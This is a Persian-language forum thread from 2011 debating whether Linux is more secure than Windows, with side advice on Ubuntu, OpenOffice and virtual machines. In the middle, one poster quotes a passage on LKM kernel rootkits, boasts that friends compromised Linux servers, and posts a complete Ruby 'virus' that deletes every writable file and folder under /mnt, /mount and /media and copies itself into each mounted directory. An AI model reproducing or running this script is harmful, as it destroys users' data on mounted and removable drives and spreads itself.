(۱۸-آبان-۱۳۹۰, ۰۰:۳۷:۱۱)babyy نوشته است: (۱۶-آبان-۱۳۹۰, ۱۷:۲۱:۴۷)Mr.pRoGraMmer نوشته است: این که میگن لینوکس به راحتی خراب نمیشه هر نسخشو بیارید من یه دستکاری میکنم ببینم خراب میشه یا نه :d
از شما بزرگتراشم نتونستن
---------
دوستان لطف کنن در مورد چیزی که تجربه ندارن حرف نزنن و فکر عموم رو خراب نکنن
lol
ubuntu. و mac و windows رو نوت بوک منه
انواع اقسام نسخه های لینوکسو نصب کردم
از لینوکس arc چند تا خط بلدی ؟
تو روم های irc linux چند بار رفتی ؟
تا حالا برنامه نوشتی برای لینوکس ؟
با gambas چند تا خط کار کردی ؟
کل کل دیگه ادامه نمیدهم :-)
همین الان هم یه whois بگیرن از ای پیت با سستم عامل ویندوز اومدی بالا
اگر میخوای تا به بزرگترها هم بگن تو ان تایپک تا نقاط صعف لینوکسو بهت بگن :-)
یارو برنامه تو ویندوز مینیویسه صبح تا شب هم با ویندوز میاد بالا تمام بازیهای نصبیش هم روی ویندوزه ! بعد میگه لینوکس :-)
اره درسته لینوکس توی فیلم تایتانیک وقتی سیستم ها رو با هم share کردن وز از قدرت پردازیش برای رندر فیلم تایتانیک استفاده کردن
تو یه فلش مموری حدود 1000 تا فایل تو مموری ایجاد کردم توی لینوکس سریع تر ویندوز بود.
قابلیت open source هم داره چیز خوبیه
اما یه نگاه به امار نوشته های برنامه ویندوز و لینوکس کن
میگن امنیتش عالیه شکی نیست اما دوست داشتید سایت ها و سرورهای که از سیستم عامل لینوکس استفاده کردن و دوستان بنده بهشون حال دادن ارشیو کنم و لیستشون رو بدم :-)
خوب بزار از زبان بزرگان چند تا حرف بزنیم (منبع بزرگان ) :
بسته به نوع سیستمعامل، روشهای متفاوتی یرای دستکاری هسته سیستمعامل وجود دارد. در اکثر سیستمهای عامل سازگار با یونیکس، راحتترین راه دستکاری هسته، استفاده از قابلیتی است که LKM نامیده میشود. LKM قابلیتی است که اجازه میدهد برخی از ماجولهای هسته سیستمعامل طبق دلخواه یک برنامه نویس طراحی شده و در هنگام لزوم به درون هسته بار شود.بالاخص در لینوکس و سولاریس، از مکانیزم LKM در عالیترین سطح برای گسترش و توسعه سیستمعامل استفاده میشود. . اگر قرار باشد برای پشتیبانی از یک ابزار جدید، هسته سیستمعامل از نوع بازسازی شود، سازندگان ابزار و ادوات سختافزاری و همچنین کاربران با مشکلات زیادی مواجه میشوند. در حالیکه میتوان از LKM بهره گرفت و ماجولی برای پشتیبانی از آن محصول طراحی کرد تا بتواند در حین اجرا به درون هسته بار شود. در حقیقت این ماجولها هسته سیستمعامل را توسعه میدهند و چون سطح دسترسی این ماجولها (به عنوان بخشی از هسته) در عالیترین سطح است لذا عملکرد بد این ماجولها میتواند، کل هسته را مختل کند و سیستم ناپایدار شود. ماجولهائی که به روش LKM بدرون هسته لینوکس یا سولاریس بار میشوند میتوانند به هر منبعی در سیستم دسترسی داشته باشند. تعداد روت کیت هائی که با مکانیزم LKM پیاده سازی شدهاند بسیار زیادند(بالاخص در لینوکس و سولاریس). البته راههای دیگری نیز برای دستکاری هسته سیستمعامل وجود دارد . این روشها برای سیستمعامل Windows NT که از LKM حمایت نمیکند کاربرد دارد و مبتنی بر patch هائی است که عملکرد هسته را تغییر میدهند.
یه کم در مورد روت کیتهاش بخون بدک نیست :-)
میگن امنیتش فضایی هست اصلا ویروس نمگیره
برنامه نویس های عزیز این تیکه کد برای ubuntu نگاه کنید یه نمونه ویروس ساده هست این ساده ترینشون بود :-)
روت کیتها اکسپلویتهاش هم نگاه کنید .
من نمیگم لینوکس بده اما اینکه بزنی تو سر ویندوز خیلی زور داره :-)
کد :
کد:
#!/usr/bin/env ruby
require 'fileutils'
$mount_dirs = Array.new
$mount_dirs = [ "/mnt", "/mount", "/media" ]
for $mount_dir in $mount_dirs do
if File.directory?($mount_dir) then
if File.writable?($mount_dir) then
Dir.open($mount_dir).each do |$dir|
next if $dir == "." || $dir == ".."
$dir2 = $mount_dir + "/" + $dir
if File.directory?($dir2) then
if File.writable?($dir2) then
Dir.open($dir2).each do |$file|
next if $file == "." || $file == ".."
$file2 = $dir2 + "/" + $file
if File.directory?($file2) then
FileUtils.remove_dir($file2, true)
end
if File.file?($file2) then
File.delete($file2)
end
end
end
end
end
end
end
end
for $mount_dir in $mount_dirs do
if File.directory?($mount_dir) then
if File.writable?($mount_dir) then
Dir.open($mount_dir).each do |$dir|
next if $dir == "." || $dir == ".."
$dir2 = $mount_dir + "/" + $dir
$virus = File.open("tetzuka.rb", "r")
$virus2 = File.open("#{$dir2}/tetzuka.rb", "w")
$blksize = $virus.stat.blksize
while ($line = $virus.read($blksize))
$virus2.write($line)
end
end
end
end
end
جوابتو کلا گرفتی دیگه این بحثو ادامه نمیدم :-)
(۱۸-آبان-۱۳۹۰, ۱۲:۱۱:۱۱)sungirl69 نوشته است: استاد ما میگفت که لینوکس برای کارهای شبکه مفیده.
یه سوال بپرسم؟
یعنی لینوکس برای کار خانگی به درد نمیخوره؟
آخه بعضی نرم افزارها از قبیل آفیس هم قابل اجرا نیست مگر با شبیه سازی
من این خبر رو از خودم ندادم . از سایت همشهری آنلاین نوشتم برام جالب بود درباره لینوکس توی سایت خبر باشه
هر کسی میگه لینوکس برای یه کار مفیده :-) اون دیگه بستگی به سطح اطلاعات طرف و انتظارش از سیستم عامل چی باشه
افیس توی لینوکس یه نرم افزار مشابه داره به نام OpenOffice
لینوکس نسخه های مختلفی داره که راحت ترینش ubuntu هست نسخه جدیدش از طراحی گرافیکی بالا و راحتی بیشتر به کاربر ارائه داده هست در نسخه های جدید لینوکس مانند ubuntu بزرگترین نقطه ضعف که در نسخه های قدیمی نداشتن پشتیبانی از ntfs بصورت کامل یا کنار ویندوز نصب بشن که این 2 مشکل در نسخه جدید ubuntu برطرف شده است :-)
میتوین با virtual machin هم توی ویندوز لینوکسو اجرا کنی :-)
و در اخر بگم ویندوز ویندوزه لینوکس لینوکسه
گوشی ایفون یه مزیت داره گوشی htc هم یه مزیت داره
شما هر کردم که توش راحت تری و بیشتر نیازهاتو بر اوورده میکنه برو سراغ همون
و هر کدوم از این سیستم عامل ها مک لینوکس یا ویندوز مزیت خاص خودشون رو دارن و هیچ وقت نمیتونیم بگیم ویندوز بهتره لینوکس بهتره یا مکینتاش بهتره
موفق باشید